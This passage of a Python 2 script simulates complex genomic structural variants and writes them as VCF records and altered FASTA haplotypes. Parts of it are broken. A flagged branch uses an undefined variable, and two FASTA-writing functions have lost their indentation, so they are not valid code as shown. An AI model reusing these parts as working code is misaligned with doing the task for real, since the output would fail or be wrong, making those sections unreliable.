                if not alt in unresolved[truth]:
                    unresolved[truth].append(alt)
    return unresolved
def csv_region_pick(sv_size):
    #pick random regions across the genome
    # Complex-SV variant of sv_region_pick: picks random windows per
    # chromosome and assigns each a complex SV type (from global csv1_keys)
    # plus one of its rearranged forms (csv1_csv2_hash); the SV's blocks are
    # placed as roughly evenly spaced breakpoints inside the window.
    SV_region=[]
    rec=-1
    sv_size=random.sample(sv_size,len(sv_size))  # shuffle the size pool
    for k1 in range(len(chromos)):
        chromosome=chromos[k1]
        num_region=chromo_num_region[k1]
        range_region=chromo_length[chromosome]
        temp_start_region=sorted(random.sample(range(1000, range_region-1000),num_region+1))
        temp_end_region=[]
        k2=-1
        # while-loop instead of for so a failed placement can retry the slot
        while True:
            if k2==num_region-1: break
            k2+=1
            print [rec,k2,len(SV_region)]
            start=temp_start_region[k2]
            start2=temp_start_region[k2+1]
            if start2-start<1000: continue  # window narrower than 1kb: skip
            rec+=1
            temp_sv_size=random.choice(sv_size)
            sv_type=random.choice(csv1_keys)
            if sv_type in csv_hash.keys():
                rearranged_SV=random.choice(csv1_csv2_hash[sv_type])
                num_blocks=len(sv_type.split('/')[0])
                end=start+temp_sv_size
                if not temp_sv_size/num_blocks>200 or end>start2-300:
                    # blocks too small or SV exceeds the window: retry this slot
                    rec-=1
                    k2-=1
                    continue
                else:
                    num_of_bps=num_blocks-1
                    mid_length=temp_sv_size/num_blocks  # Python-2 integer division
                    bps_out=[start]
                    for x in range(num_of_bps):
                        bps_out.append(random.choice(range(bps_out[-1]+100,start+(x+1)*mid_length-100)))
                    bps_out.append(end)
                    SV_region.append([chromos[k1]]+bps_out+[sv_type,rearranged_SV])
    return SV_region
def csv_info_rewrite(sv_h_info):
    """Group SV records into {ref_structure: {alt_structure: [records]}}.

    Each input record ends with (ref_structure, alt_structure); the stored
    value is the remaining fields stringified plus a trailing 0.0 score.
    """
    grouped={}
    for record in sv_h_info:
        ref_key=record[-2]
        alt_key=record[-1]
        if not ref_key in grouped.keys():
            grouped[ref_key]={}
        if not alt_key in grouped[ref_key].keys():
            grouped[ref_key][alt_key]=[]
        grouped[ref_key][alt_key].append([str(i) for i in record[:-2]]+[0.0])
    return grouped
def csv_rec_write(SV_region):
    # Write the SV_region records to '<output-prefix>.SV.rec' (prefix from the
    # global dict_opts), ordered by chromosome (global chromos order) then
    # start position; duplicate records are written once. Returns the
    # {chrom: {start: [records]}} index used for ordering.
    out_hash={}
    for x1 in SV_region:
        if not x1[0] in out_hash.keys():
            out_hash[x1[0]]={}
        if not x1[1] in out_hash[x1[0]].keys():
            out_hash[x1[0]][x1[1]]=[]
        if not x1 in out_hash[x1[0]][x1[1]]:
            out_hash[x1[0]][x1[1]].append(x1)
    fout=dict_opts['--output-prefix']+'.SV.rec'
    fo=open(fout,'w')
    print fout
    for x1 in chromos:
        if x1 in out_hash.keys():
            for x2 in sorted(out_hash[x1].keys()):
                for x3 in out_hash[x1][x2]:
                    print >>fo, ' '.join([str(i) for i in x3])
    fo.close()
    return out_hash
def tra_info_add(k1,k2):
    # Translate one (truth k1, alternative k2) structure pair into VCF-style
    # records stored in the global tra1[SV_ID]['a'/'b'], one entry per
    # haplotype. Haplotypes explainable as pure deletions produce 'DEL' rows;
    # anything with inversion/duplication/translocation content produces
    # paired breakend (BND) rows in VCF '['/']' mate notation.
    # Reads globals: sv_info, tra1, chromos, ref.
    for k3 in sv_info[k1][k2]:
        SV_ID='_'.join([str(i) for i in k3[:-1]])
        tra1[SV_ID]={}
        k2a=k2.split('/')[0]
        k2b=k2.split('/')[1]
        bp_hash={}
        block_rec=0
        block_hash=[]
        # group the breakpoint fields per chromosome: [chrom,pos,pos,...]
        for a3 in k3[:-1]:
            if a3 in chromos or not a3.isdigit():
                block_hash.append([a3])
            else:
                block_hash[-1].append(a3)
        # letter 'a','b',... -> [chrom,left,right] per breakpoint interval
        for a3 in block_hash:
            for a4 in range(len(a3)-2):
                bp_hash[chr(97+block_rec)]=[a3[0],a3[a4+1],a3[a4+2]]
                block_rec+=1
        # expand each coordinate into the (pos-1,pos) flanking pair
        for a3 in bp_hash.keys():
            temp=[]
            for a4 in bp_hash[a3][1:]:
                temp.append(int(a4)-1)
                temp.append(int(a4))
            bp_hash[a3][1:]=temp
        #ref_allele['left']=[ref_allele[k1[0]][0]]
        #ref_allele['right']=[ref_allele[k1[-1]][1]]
        # synthetic flanking blocks outside the first/last SV block
        bp_hash['left']=[bp_hash[k1[0]][0],bp_hash[k1[0]][1],bp_hash[k1[0]][2]]
        bp_hash['right']=[bp_hash[k1[-1]][0],bp_hash[k1[-1]][3],bp_hash[k1[-1]][4]]
        ref_allele={}
        # reference base at every stored coordinate (stubbed to 'N' via ref_base_returnN)
        for a3 in bp_hash.keys():
            ref_allele[a3]=[bp_hash[a3][0]]
            for a4 in bp_hash[a3][1:]:
                ref_allele[a3].append(ref_base_returnN(ref,bp_hash[a3][0],a4))
        # ---- haplotype a ----
        if not k2a==k1.split('/')[0] and del_flag_SA(k1.split('/')[0],k2a)==0:
            flag1=0#flag1==0:w/o inversion in the alt structure
            if '^' in k2a:
                flag1+=1
            flag2=0#flag2==0:w/o duplication in the alt structure
            for j in k2a:
                if k2a.count(j)>1:
                    flag2+=1
            flag3=0 #flag3==0: w/o translocation
            if len(k2a)>1:
                for i in range(len(k2a)-1):
                    if not ord(k2a[i+1])>ord(k2a[i]):
                        flag3+=1
            if flag1+flag2+flag3==0:
                # deletion-only haplotype: emit DEL records for missing letters
                heta_Del_block=[]
                for a1 in k1.split('/')[0]:
                    if not a1 in k2a:
                        heta_Del_block.append(a1)
                tra1[SV_ID]['a']=[]
                block_hash=[]
                del_hash={}
                block_rec=0
                # NOTE(review): `a2` is not defined anywhere in this function;
                # this branch raises NameError if it is ever reached -- confirm
                # whether `k3` (or an outer variable) was intended.
                for a3 in a2[0]:
                    if a3 in chromos:
                        block_hash.append([a3])
                    else:
                        block_hash[-1].append(a3)
                for a3 in block_hash:
                    for a4 in range(len(a3)-2):
                        del_hash[chr(97+block_rec)]=[a3[0],a3[a4+1],a3[a4+2]]
                        block_rec+=1
                if not heta_Del_block==[]:
                    a_heta=0
                    # merge alphabetically consecutive, same-chromosome deleted letters
                    heta_Del_new=[heta_Del_block[0]]
                    while True:
                        a_heta+=1
                        if a_heta==len(heta_Del_block):break
                        if ord(heta_Del_block[a_heta])-ord(heta_Del_block[a_heta-1])==1 and del_hash[heta_Del_block[a_heta]][0]==del_hash[heta_Del_block[a_heta-1]][0]:
                            heta_Del_new[-1]+=heta_Del_block[a_heta]
                        else:
                            heta_Del_new.append(heta_Del_block[a_heta])
                    for a3 in heta_Del_new:
                        a4=a3[0]
                        tra1[SV_ID]['a'].append(['DEL',del_hash[a4][0],int(del_hash[a4][1]),ref_allele[a4][2]])
                        a4=a3[-1]
                        tra1[SV_ID]['a'][-1].append(int(del_hash[a4][2])-1)
            else:
                # complex haplotype: emit paired breakend records
                tra1[SV_ID]['a']=[]
                t1=[]
                # tokenize the alt structure, attaching '^' to its letter
                for a3 in k2a:
                    if not a3=='^':
                        t1.append(a3)
                    else:
                        t1[-1]+=a3
                # merge tokens that remain reference-adjacent on one chromosome
                t2=[t1[0]]
                for a3 in t1[1:]:
                    if not '^' in a3 and not '^' in t2[-1] and ord(a3)-ord(t2[-1][-1])==1 and bp_hash[a3[0]][0]==bp_hash[t2[-1][-1]][0]:
                        t2[-1]+=a3
                    elif '^' in a3 and '^' in t2[-1] and ord(t2[-1][-2])-ord(a3[0])==1 and bp_hash[a3[0]][0]==bp_hash[t2[-1][-2]][0]:
                        t2[-1]+=a3
                    else:
                        t2.append(a3)
                # breakends joining the left flank to the first block
                a3='left'
                a4=t2[0]
                l_chr=bp_hash[a3][0]
                r_chr=bp_hash[a4[0]][0]
                if not '^' in a4:
                    if not a4[0]==k1[0]:
                        tra1[SV_ID]['a'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],']'+l_chr+':'+str(bp_hash[a3][1])+']'+ref_allele[a4[0]][2]])
                        tra1[SV_ID]['a'].append([l_chr,bp_hash[a3][1],ref_allele[a3][1],ref_allele[a3][1]+'['+r_chr+':'+str(bp_hash[a4[0]][2])+'['])
                elif '^' in a4:
                    tra1[SV_ID]['a'].append([r_chr, bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+']'+l_chr+':'+str(bp_hash[a3][1])+']'])
                    tra1[SV_ID]['a'].append([l_chr,bp_hash[a3][1],ref_allele[a3][1],ref_allele[a3][1]+']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'])
                # breakends between each pair of adjacent blocks; orientation
                # of the '['/']' notation depends on which side is inverted
                for t3 in range(len(t2)-1):
                    a3=t2[t3]
                    a4=t2[t3+1]
                    l_chr=bp_hash[a3[0]][0]
                    r_chr=bp_hash[a4[0]][0]
                    if not '^' in a3 and not '^' in a4:
                        tra1[SV_ID]['a'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'+ref_allele[a4[0]][2]])
                        tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+'['+bp_hash[a4[0]][0]+':'+str(bp_hash[a4[0]][2])+'['])
                    elif '^' in a3 and not '^' in a4:
                        tra1[SV_ID]['a'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['+ref_allele[a4[0]][2]])
                        tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2],'['+bp_hash[a4[0]][0]+':'+str(bp_hash[a4[0]][2])+'['+ref_allele[a3[-2]][2]])
                    elif not '^' in a3 and '^' in a4:
                        tra1[SV_ID]['a'].append([r_chr,bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'])
                        tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'])
                    elif '^' in a3 and '^' in a4:
                        tra1[SV_ID]['a'].append([r_chr,bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['])
                        tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2], ']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'+ref_allele[a3[-2]][2]])
                # breakends joining the last block to the right flank
                # (t3 holds its final loop value when len(t2)>1)
                if len(t2)>1:
                    a3=t2[t3+1]
                else:
                    a3=t2[0]
                a4='right'
                l_chr=bp_hash[a3[0]][0]
                r_chr=bp_hash[a4][0]
                if not '^' in a3:
                    if not a3[-1]==k1[-1]:
                        tra1[SV_ID]['a'].append([r_chr,bp_hash[a4][2],ref_allele[a4][2],']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'+ref_allele[a4][2]])
                        tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+'['+bp_hash[a4][0]+':'+str(bp_hash[a4][2])+'['])
                if '^' in a3:
                    tra1[SV_ID]['a'].append([r_chr,bp_hash[a4][2],ref_allele[a4][2],'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['+ref_allele[a4][2]])
                    tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2],'['+bp_hash[a4][0]+':'+str(bp_hash[a4][2])+'['+ref_allele[a3[-2]][2]])
        #print [k1,k2]
        # ---- haplotype b (mirror of haplotype a, using k2b) ----
        if not k2b==k1.split('/')[1] and del_flag_SA(k1.split('/')[1],k2b)==0:
            flag1=0#flag1==0:w/o inversion in the alt structure
            if '^' in k2b:
                flag1+=1
            flag2=0#flag2==0:w/o duplication in the alt structure
            for j in k2b:
                if k2b.count(j)>1:
                    flag2+=1
            flag3=0 #flag3==0: w/o translocation
            if len(k2b)>1:
                for i in range(len(k2b)-1):
                    if not ord(k2b[i+1])>ord(k2b[i]):
                        flag3+=1
            if flag1+flag2+flag3==0:
                # deletion-only haplotype: emit DEL records for missing letters
                heta_Del_block=[]
                for a1 in k1.split('/')[1]:
                    if not a1 in k2b:
                        heta_Del_block.append(a1)
                tra1[SV_ID]['b']=[]
                block_hash=[]
                del_hash={}
                block_rec=0
                # NOTE(review): same undefined `a2` issue as in haplotype a.
                for a3 in a2[0]:
                    if a3 in chromos:
                        block_hash.append([a3])
                    else:
                        block_hash[-1].append(a3)
                for a3 in block_hash:
                    for a4 in range(len(a3)-2):
                        del_hash[chr(97+block_rec)]=[a3[0],a3[a4+1],a3[a4+2]]
                        block_rec+=1
                if not heta_Del_block==[]:
                    a_heta=0
                    heta_Del_new=[heta_Del_block[0]]
                    while True:
                        a_heta+=1
                        if a_heta==len(heta_Del_block):break
                        if ord(heta_Del_block[a_heta])-ord(heta_Del_block[a_heta-1])==1 and del_hash[heta_Del_block[a_heta]][0]==del_hash[heta_Del_block[a_heta-1]][0]:
                            heta_Del_new[-1]+=heta_Del_block[a_heta]
                        else:
                            heta_Del_new.append(heta_Del_block[a_heta])
                    for a3 in heta_Del_new:
                        a4=a3[0]
                        tra1[SV_ID]['b'].append(['DEL',del_hash[a4][0],int(del_hash[a4][1]),ref_allele[a4][2]])
                        a4=a3[-1]
                        tra1[SV_ID]['b'][-1].append(int(del_hash[a4][2])-1)
            else:
                # complex haplotype: emit paired breakend records
                tra1[SV_ID]['b']=[]
                t1=[]
                for a3 in k2b:
                    if not a3=='^':
                        t1.append(a3)
                    else:
                        t1[-1]+=a3
                t2=[t1[0]]
                for a3 in t1[1:]:
                    if not '^' in a3 and not '^' in t2[-1] and ord(a3)-ord(t2[-1][-1])==1 and bp_hash[a3[0]][0]==bp_hash[t2[-1][-1]][0]:
                        t2[-1]+=a3
                    elif '^' in a3 and '^' in t2[-1] and ord(t2[-1][-2])-ord(a3[0])==1 and bp_hash[a3[0]][0]==bp_hash[t2[-1][-2]][0]:
                        t2[-1]+=a3
                    else:
                        t2.append(a3)
                a3='left'
                a4=t2[0]
                l_chr=bp_hash[a3][0]
                r_chr=bp_hash[a4[0]][0]
                if not '^' in a4:
                    if not a4[0]==k1[0]:
                        tra1[SV_ID]['b'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],']'+l_chr+':'+str(bp_hash[a3][1])+']'+ref_allele[a4[0]][2]])
                        tra1[SV_ID]['b'].append([l_chr,bp_hash[a3][1],ref_allele[a3][1],ref_allele[a3][1]+'['+r_chr+':'+str(bp_hash[a4[0]][2])+'['])
                elif '^' in a4:
                    tra1[SV_ID]['b'].append([r_chr, bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+']'+l_chr+':'+str(bp_hash[a3][1])+']'])
                    tra1[SV_ID]['b'].append([l_chr,bp_hash[a3][1],ref_allele[a3][1],ref_allele[a3][1]+']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'])
                for t3 in range(len(t2)-1):
                    a3=t2[t3]
                    a4=t2[t3+1]
                    l_chr=bp_hash[a3[0]][0]
                    r_chr=bp_hash[a4[0]][0]
                    if not '^' in a3 and not '^' in a4:
                        tra1[SV_ID]['b'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'+ref_allele[a4[0]][2]])
                        tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+'['+bp_hash[a4[0]][0]+':'+str(bp_hash[a4[0]][2])+'['])
                    elif '^' in a3 and not '^' in a4:
                        tra1[SV_ID]['b'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['+ref_allele[a4[0]][2]])
                        tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2],'['+bp_hash[a4[0]][0]+':'+str(bp_hash[a4[0]][2])+'['+ref_allele[a3[-2]][2]])
                    elif not '^' in a3 and '^' in a4:
                        tra1[SV_ID]['b'].append([r_chr,bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'])
                        tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'])
                    elif '^' in a3 and '^' in a4:
                        tra1[SV_ID]['b'].append([r_chr,bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['])
                        tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2], ']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'+ref_allele[a3[-2]][2]])
                if len(t2)>1:
                    a3=t2[t3+1]
                else:
                    a3=t2[0]
                a4='right'
                l_chr=bp_hash[a3[0]][0]
                r_chr=bp_hash[a4][0]
                if not '^' in a3:
                    if not a3[-1]==k1[-1]:
                        tra1[SV_ID]['b'].append([r_chr,bp_hash[a4][2],ref_allele[a4][2],']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'+ref_allele[a4][2]])
                        tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+'['+bp_hash[a4][0]+':'+str(bp_hash[a4][2])+'['])
                if '^' in a3:
                    tra1[SV_ID]['b'].append([r_chr,bp_hash[a4][2],ref_allele[a4][2],'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['+ref_allele[a4][2]])
                    tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2],'['+bp_hash[a4][0]+':'+str(bp_hash[a4][2])+'['+ref_allele[a3[-2]][2]])
def hash_reorder():
    # Reshape the per-type call stores (globals del1/inv1/dup1/tra1) into the
    # global sv_out as VCF-style rows
    # [chrom,pos,ID,REF,ALT,QUAL,FILTER,INFO,FORMAT,sample].
    # Genotype comes from the het/homo tag; scores below the global score_Cff
    # are marked 'LowQual'. Duplicate rows are stored once.
    for ka1 in del1.keys():
        if not ka1 in sv_out.keys():
            sv_out[ka1]={}
        for ka2 in del1[ka1]:
            #fref=os.popen(r'''samtools faidx %s %s:%s-%s'''%(ref,ka1,str(ka2[0]+1),str(ka2[0]+1)))
            #tre=fref.readline().strip().split()
            #REF_AL=fref.readline().strip().split()[0]
            REF_AL='N'  # real reference-base lookup disabled (see commented code)
            Pass_Sign='PASS'
            if ka2[3]<score_Cff:
                Pass_Sign='LowQual'
            if ka2[2]=='heta':
                GenoType='1|0'
            elif ka2[2]=='hetb':
                GenoType='0|1'
            elif ka2[2]=='homo':
                GenoType='1|1'
            else:
                print ka2[2]  # unexpected zygosity tag; GenoType stays stale
            ka_new=[ka1,ka2[0],ka2[-1],REF_AL,'<DEL>',ka2[3],Pass_Sign,'SVTYPE=DEL;END='+str(ka2[1]),'GT',GenoType]
            if not ka2[-1] in sv_out[ka1].keys():
                sv_out[ka1][ka2[-1]]=[]
            if not ka_new in sv_out[ka1][ka2[-1]]:
                sv_out[ka1][ka2[-1]].append(ka_new)
    for ka1 in inv1.keys():
        if not ka1 in sv_out.keys():
            sv_out[ka1]={}
        for ka2 in inv1[ka1]:
            #fref=os.popen(r'''samtools faidx %s %s:%s-%s'''%(ref,ka1,str(ka2[0]+1),str(ka2[0]+1)))
            #tre=fref.readline().strip().split()
            #REF_AL=fref.readline().strip().split()[0]
            REF_AL='N'  # real reference-base lookup disabled (see commented code)
            Pass_Sign='PASS'
            if ka2[3]<score_Cff:
                Pass_Sign='LowQual'
            if ka2[2]=='heta':
                GenoType='1|0'
            elif ka2[2]=='hetb':
                GenoType='0|1'
            elif ka2[2]=='homo':
                GenoType='1|1'
            else:
                print ka2[2]
            ka_new=[ka1,ka2[0],ka2[-1],REF_AL,'<INV>',ka2[3],Pass_Sign,'SVTYPE=INV;END='+str(ka2[1]),'GT',GenoType]
            if not ka2[-1] in sv_out[ka1].keys():
                sv_out[ka1][ka2[-1]]=[]
            if not ka_new in sv_out[ka1][ka2[-1]]:
                sv_out[ka1][ka2[-1]].append(ka_new)
    for ka1 in dup1.keys():
        if not ka1 in sv_out.keys():
            sv_out[ka1]={}
        for ka2 in dup1[ka1]:
            #fref=os.popen(r'''samtools faidx %s %s:%s-%s'''%(ref,ka1,str(ka2[0]+1),str(ka2[0]+1)))
            #tre=fref.readline().strip().split()
            #REF_AL=fref.readline().strip().split()[0]
            REF_AL='N'  # real reference-base lookup disabled (see commented code)
            CopyNumber=str(ka2[-1])  # DUP records carry copy number as last field
            Pass_Sign='PASS'
            if ka2[3]<score_Cff:
                Pass_Sign='LowQual'
            if ka2[2]=='heta':
                GenoType='1|0'
            elif ka2[2]=='hetb':
                GenoType='0|1'
            elif ka2[2]=='homo':
                GenoType='1|1'
            else:
                print ka2[2]
            ka_new=[ka1,ka2[0],ka2[-2],REF_AL,'<DUP>',ka2[3],Pass_Sign,'SVTYPE=DUP;END='+str(ka2[1]),'GT:CN',GenoType+':'+CopyNumber]
            if not ka2[-2] in sv_out[ka1].keys():
                sv_out[ka1][ka2[-2]]=[]
            if not ka_new in sv_out[ka1][ka2[-2]]:
                sv_out[ka1][ka2[-2]].append(ka_new)
    for ka1 in tra1.keys():
        # tra1 keys look like '<chrom>_..._<score>'
        ks1=ka1.split('_')[0]
        ks2='_'.join(ka1.split('_')[:-1])  # SV ID without the trailing score
        SV_Score=float(ka1.split('_')[-1])
        Pass_Sign='PASS'
        if SV_Score<score_Cff:
            Pass_Sign='LowQual'
        if not ks1 in sv_out.keys():
            sv_out[ks1]={}
        if not ks2 in sv_out[ks1].keys():
            sv_out[ks1][ks2]=[]
        for ka2 in tra1[ka1].keys():
            hetx='het'+ka2
            if ka2=='a':
                GenoType='1|0'
            elif ka2=='b':
                GenoType='0|1'
            else:
                print ka2[2]
            for ka3 in tra1[ka1][ka2]:
                ka_new=ka3[:2]+[ks2,ka3[2]]+ka3[3:]+[SV_Score,Pass_Sign,'SVTYPE=TRA','GT',GenoType]
                if not ka_new in sv_out[ks1][ks2]:
                    sv_out[ks1][ks2].append(ka_new)
def fasta_comp_write_a(fasta_out):
fo1=open(fasta_out.replace('.comp.fa','.comp1.fa'),'w')
#fo2=open(fasta_out.replace('.het.fa','.het2.fa'),'w')
fo1.close()
#fo2.close()
print fasta_out.replace('.comp.fa','.comp1.fa')
#print fasta_out.replace('.het.fa','.het2.fa')
for k1 in chromos:
fo1=open(fasta_out.replace('.comp.fa','.comp1.fa'),'a')
#fo2=open(fasta_out.replace('.het.fa','.het2.fa'),'a')
print >>fo1, '>'+k1
#print >>fo2, '>'+k1
new1_ref=''
rec1_start=0
#new2_ref=''
#rec2_start=0
for k2 in sorted(order_SV_Pos[k1].keys()):
print [k1,k2]
rec1_start+=1
k3=order_SV_Pos[k1][k2]
start=int(k3[0][0][1])
end=int(k3[0][0][-1])
new1_ref+=Ref_Ref_Produce(k1,[rec1_start,start-1],ref)
if not k3[0][1][0]==k3[0][1][2]:
new1_ref+=Ref_Alt_Produce(chromos,k3[0][0],k3[0][1][0],ref)
else:
new1_ref+=Ref_Ref_Produce(k1,[start,end],ref)
rec1_start=end
rec1_start+=1
#rec2_start+=1
new1_ref+=Ref_Ref_Produce(k1,[rec1_start,chromo_length[k1]],ref)
new1_seq=[]
for ka1 in range(len(new1_ref)/60):
new1_seq.append(new1_ref[ka1*60:(ka1+1)*60])
new1_seq.append(new1_ref[(ka1+1)*60:])
for ka1 in new1_seq:
if not ka1=='':
print >>fo1, ka1
fo1.close()
def fasta_comp_write_b(fasta_out):
#fo1=open(fasta_out.replace('.het.fa','.het1.fa'),'w')
fo2=open(fasta_out.replace('.comp.fa','.comp2.fa'),'w')
#fo1.close()
fo2.close()
#print fasta_out.replace('.het.fa','.het1.fa')
print fasta_out.replace('.comp.fa','.comp2.fa')
for k1 in chromos:
#fo1=open(fasta_out.replace('.het.fa','.het1.fa'),'a')
fo2=open(fasta_out.replace('.comp.fa','.comp2.fa'),'a')
#print >>fo1, '>'+k1
print >>fo2, '>'+k1
#new1_ref=''
#rec1_start=0
new2_ref=''
rec2_start=0
for k2 in sorted(order_SV_Pos[k1].keys()):
print [k1,k2]
k3=order_SV_Pos[k1][k2]
start=int(k3[0][0][1])
end=int(k3[0][0][-1])
rec2_start+=1
new2_ref+=Ref_Ref_Produce(k1,[rec2_start,start-1],ref)
if not k3[0][1][1]==k3[0][1][2]:
new2_ref+=Ref_Alt_Produce(chromos,k3[0][0],k3[0][1][1],ref)
else:
new2_ref+=Ref_Ref_Produce(k1,[start,end],ref)
rec2_start=end
#rec1_start+=1
rec2_start+=1
new2_ref+=Ref_Ref_Produce(k1,[rec2_start,chromo_length[k1]],ref)
new2_seq=[]
for ka1 in range(len(new2_ref)/60):
new2_seq.append(new2_ref[ka1*60:(ka1+1)*60])
new2_seq.append(new2_ref[(ka1+1)*60:])
for ka1 in new2_seq:
if not ka1=='':
print >>fo2, ka1
#fo1.close()
fo2.close()
def write_VCF_header(output_file):
    """Create *output_file* and write a standard VCFv4.1 header.

    Emits fileformat/fileDate/reference meta lines, the INFO/FILTER/ALT/FORMAT
    declarations used by this simulator, and the #CHROM column line.  The
    sample column name is the output file's basename without '.vcf'.
    """
    fo=open(output_file,'w')
    print output_file
    print>>fo, '##fileformat=VCFv4.1'
    print>>fo,'##fileDate='+time.strftime("%Y%m%d")
    print>>fo,'##reference=hg19'
    print>>fo,'##INFO=<ID=BKPTID,Number=.,Type=String,Description="ID of the assembled alternate allele in the assembly file">'
    print>>fo,'##INFO=<ID=CIEND,Number=2,Type=Integer,Description="Confidence interval around END for imprecise variants">'
    print>>fo,'##INFO=<ID=CIPOS,Number=2,Type=Integer,Description="Confidence interval around POS for imprecise variants">'
    print>>fo,'##INFO=<ID=END,Number=1,Type=Integer,Description="End position of the variant described in this record">'
    print>>fo,'##INFO=<ID=HOMLEN,Number=.,Type=Integer,Description="Length of base pair identical micro-homology at event breakpoints">'
    print>>fo,'##INFO=<ID=HOMSEQ,Number=.,Type=String,Description="Sequence of base pair identical micro-homology at event breakpoints">'
    print>>fo,'##INFO=<ID=IMPRECISE,Number=0,Type=Flag,Description="Imprecise structural variation">'
    print>>fo,'##INFO=<ID=MEINFO,Number=4,Type=String,Description="Mobile element info of the form NAME,START,END,POLARITY">'
    print>>fo,'##INFO=<ID=SVLEN,Number=.,Type=Integer,Description="Difference in length between REF and ALT alleles">'
    print>>fo,'##INFO=<ID=SVTYPE,Number=1,Type=String,Description="Type of structural variant">'
    print>>fo,'##FILTER=<ID=LowQual,Description="Score of final structural - Theoretical Score <-50">'
    print>>fo,'##ALT=<ID=DEL,Description="Deletion">'
    print>>fo,'##ALT=<ID=DEL:ME:ALU,Description="Deletion of ALU element">'
    print>>fo,'##ALT=<ID=DEL:ME:L1,Description="Deletion of L1 element">'
    print>>fo,'##ALT=<ID=DUP,Description="Duplication">'
    print>>fo,'##ALT=<ID=DUP:TANDEM,Description="Tandem Duplication">'
    print>>fo,'##ALT=<ID=INS,Description="Insertion of novel sequence">'
    print>>fo,'##ALT=<ID=INS:ME:ALU,Description="Insertion of ALU element">'
    print>>fo,'##ALT=<ID=INS:ME:L1,Description="Insertion of L1 element">'
    print>>fo,'##ALT=<ID=INV,Description="Inversion">'
    print>>fo,'##ALT=<ID=CNV,Description="Copy number variable region">'
    print>>fo,'##FORMAT=<ID=GT,Number=1,Type=String,Description="Genotype">'
    print>>fo,'##FORMAT=<ID=GQ,Number=1,Type=Float,Description="Genotype quality">'
    print>>fo,'##FORMAT=<ID=CN,Number=1,Type=Integer,Description="Copy number genotype for imprecise events">'
    print>>fo,'##FORMAT=<ID=CNQ,Number=1,Type=Float,Description="Copy number genotype quality for imprecise events">'
    print>>fo,'\t'.join(['#CHROM','POS','ID','REF','ALT','QUAL','FILTER','INFO','FORMAT',output_file.split('/')[-1].replace('.vcf','')])
    fo.close()
def write_VCF_main(output_file):
    """Append the VCF body records to *output_file* (header written separately).

    Reorganizes the global ``sv_out`` by chromosome and start position,
    de-duplicates records that differ only in genotype (merging the
    0|1 + 1|0 pair into a single 1|1 call), fills in an 'N' REF allele
    via ref_base_returnN, and prints tab-joined records in chromosome order.
    Relies on globals: sv_out, chromos, ref.
    """
    fo=open(output_file,'a')
    print output_file
    sv_reorganize={}
    for k1 in sv_out.keys():
        sv_reorganize[k1]={}
        for k2 in sv_out[k1].keys():
            # k2 looks like '<chrom>_<start>_...'; index by the start coordinate
            start=int(k2.split('_')[1])
            if not start in sv_reorganize[k1].keys():
                sv_reorganize[k1][start]={}
            # SVtemp_a: unique records (genotype stripped); SVtemp_b: their genotypes
            SVtemp_a=[]
            SVtemp_b=[]
            for k3 in sv_out[k1][k2]:
                if not k3[:-1] in SVtemp_a:
                    SVtemp_a.append(k3[:-1])
                    SVtemp_b.append([k3[-1]])
                else:
                    SVtemp_b[SVtemp_a.index(k3[:-1])].append(k3[-1])
            SVtemp=[]
            sv_reorganize[k1][start][k2]=[]
            # a het call on both haplotypes collapses to a single homozygous 1|1
            for k3 in range(len(SVtemp_a)):
                if len(SVtemp_b[k3])==2 and SVtemp_b[k3] in [['0|1', '1|0'],['1|0', '0|1']]:
                    SVtemp_b[k3]=['1|1']
